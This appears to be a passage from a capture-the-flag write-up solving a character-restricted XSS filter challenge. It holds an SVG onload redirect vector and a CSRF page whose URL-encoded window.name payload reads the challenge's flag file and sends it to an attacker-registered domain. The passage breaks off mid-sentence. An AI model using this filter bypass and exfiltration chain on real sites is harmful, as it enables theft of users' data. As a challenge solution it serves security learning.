This task is XSS filter with allowed characters : ```a-zA-Z ~|_^\=<-+*```

For attack we use this DOM-based vector:
```
<svg id=\ onload=location=id+id+12345609861+domain+id+1234+id
```

It will redirect to our controlled domain https://12345609861router.vip/1234/
($12.95 + Let’s Encrypt)

It has index.html with csrf in this directory.
```
<html>
<body>
<form id="send" action="https://router.vip/preview.php?" method="POST">
<input type="hidden" name="task" value="" />
<input type="hidden" name="payload" value="<svg onload=location=name" />
<input type="hidden" name="geetest_challenge" value="" />
<input type="hidden" name="geetest_validate" value="" />
<input type="hidden" name="geetest_seccode" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
window.name = "javascript:%76%61%72%20%78%68%72%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%0a%78%68%72%2e%6f%70%65%6e%28%27%47%45%54%27%2c%20%27%68%74%74%70%73%3a%2f%2f%72%6f%75%74%65%72%2e%76%69%70%2f%66%6c%61%67%2e%70%68%70%27%2c%20%66%61%6c%73%65%29%3b%0a%78%68%72%2e%73%65%6e%64%28%29%3b%0a%69%66%20%28%78%68%72%2e%73%74%61%74%75%73%20%3d%3d%20%32%30%30%29%20%7b%0a%20%20%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%73%3a%2f%2f%31%32%33%34%35%36%30%39%38%36%31%72%6f%75%74%65%72%2e%76%69%70%2f%31%32%33%34%2f%3f%72%65%73%75%6c%74%3d%27%2b%78%68%72%2e%72%65%73%70%6f%6e%73%65%54%65%78%74%3b%0a%7d";
document.getElementById("send").submit();
</script>
</body>
</html>
```

This vector set window.name with javascript:XSS payload and POST request on preview with ```